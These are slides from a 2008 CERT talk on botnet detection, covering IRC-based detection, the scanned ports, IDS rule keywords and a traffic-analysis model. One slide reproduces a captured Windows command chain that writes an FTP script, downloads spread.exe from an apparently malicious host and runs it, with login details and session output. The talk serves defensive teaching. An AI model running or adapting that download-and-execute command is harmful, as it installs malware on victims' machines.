China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC (+86) CANS 2008 Indiana University
China Science & Technology Network Computer Emergency Response Team Agenda About CSTCERT About Botnet Network Security Alert Future work
China Science & Technology Network Computer Emergency Response Team CSTCERT Overview Founded in 2002, CSTCERT(China Science and Technology Network Computer Emergency Response Team) CSTCERT is supervised by CSTNET. Services: –Incidents handling, include: attack,complaints, abnormal traffic detect and other related security incidents –research and development : Emergency Response –Security training : : :
China Science & Technology Network Computer Emergency Response Team Our work ,we have handled 266 security events. –security incidents:205 –security complaints :61
China Science & Technology Network Computer Emergency Response Team Security status is very serious!-why? You can become a hacker very easily! –Know a little knowledge –Search hacker method from Internet –Many people share their hacker tools –If you want to pay some money, someone will teach you about hacker- tech.
China Science & Technology Network Computer Emergency Response Team About Botnet A botnet is a collection of computers, connected to the internet, that interact to accomplish some distributed task. Botnet typically refers to such a system designed and used for illegal purposes. The compromised machines are referred to as drones or zombies, the malicious software running on them as 'bot'. From:
China Science & Technology Network Computer Emergency Response Team Botnet can cause ? and 。。。
China Science & Technology Network Computer Emergency Response Team How can we find Botnet? Active way: –Network protocol analysis IRC () –monitor some special TCP port(135/139/445/1433/22/2967……) –Check C&C(Command and Control Center) server address update from internet Passive way: –honeypot
China Science & Technology Network Computer Emergency Response Team
Main Character of Botnet IRC message –Port scan:advscan, asc… –File download:download –Others: ping/pong,join,mode… scan tcp port:135/139/445/1433/22/2967 Vulnerability that botnet always exploit –Weak password (ssh/MS-SQL/windows) –Overflow vulnerability(MS- SQL/windows/software)
China Science & Technology Network Computer Emergency Response Team the host was controled by this method-1 Sometimes-use scan control command
China Science & Technology Network Computer Emergency Response Team the host was controled by this method-2 Sometimes-install malware
China Science & Technology Network Computer Emergency Response Team
C:\Documents and Settings\jackie>cmd /c echo open spreadem.nowslate1703.info 21 >appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe ftp> open spreadem.nowslate1703.info 21 Connected to spreadem.nowslate1703.info Welcome to Pure-FTPd [TLS] You are user number 73 of 200 allowed. 220-Local time is now 00:15. Server port: IPv6 connections are also welcome on this server. 220 You will be disconnected after 2 minutes of inactivity. ftp> user spread baby 331 User spread OK. Password required 230-User spread has group access to: spread 230 OK. Current restricted directory is / ftp> binary 200 TYPE is now 8-bit binary ftp> get Remote file spread.exe Local file spread.exe 200 PORT command successful 150-Connecting to port kbytes to download 226-File successfully transferred seconds (measured here), Kbytes per second ftp: bytes received in 1.50Seconds 56.70Kbytes/sec. ftp> bye 221-Goodbye. You uploaded 0 and downloaded 84 kbytes. 221 Logout. C:\Documents and Settings\jackie>
China Science & Technology Network Computer Emergency Response Team Network security alert Network security alert -IDS/IPS rule For port scan:Use some IRC message word:asc/advscan for network comunication with IRC: Ping/Pong,JOIN,PRIVMSG ……
China Science & Technology Network Computer Emergency Response Team Rules for IDS
China Science & Technology Network Computer Emergency Response Team Network security alert Network security alert -Network traffic data analysis We can build a simple mathematics model to describe Network Traffic data by Numerical Analysis method (NTNA model)
China Science & Technology Network Computer Emergency Response Team Data of tcp 1433 scan Data of tcp 22 scan Data of other port scan data of src ip data of counts amounts of target ip Count_1 Count_2 。。。 Count_n Count_1 Count_2 。。。 Count_n Dst_ipsum_1 Dst_ipnsum_2 。。。 Dst_ipsum_n Dst_ipsum_1 Dst_ipnsum_2 。。。 Dst_ipsum_n Src_ip1 Src_ip2 。。。 Src_ipn Src_ip1 Src_ip2 。。。 Src_ipn
China Science & Technology Network Computer Emergency Response Team NTNA model in practice
China Science & Technology Network Computer Emergency Response Team Future work Botnet research Monitoring and countermeasure for large-scale network worm Some improvement for the NTNA model –accuracy amendment –Extension to larger scale network traffic data (netflow) –Data mining
China Science & Technology Network Computer Emergency Response Team Thank you! (+86)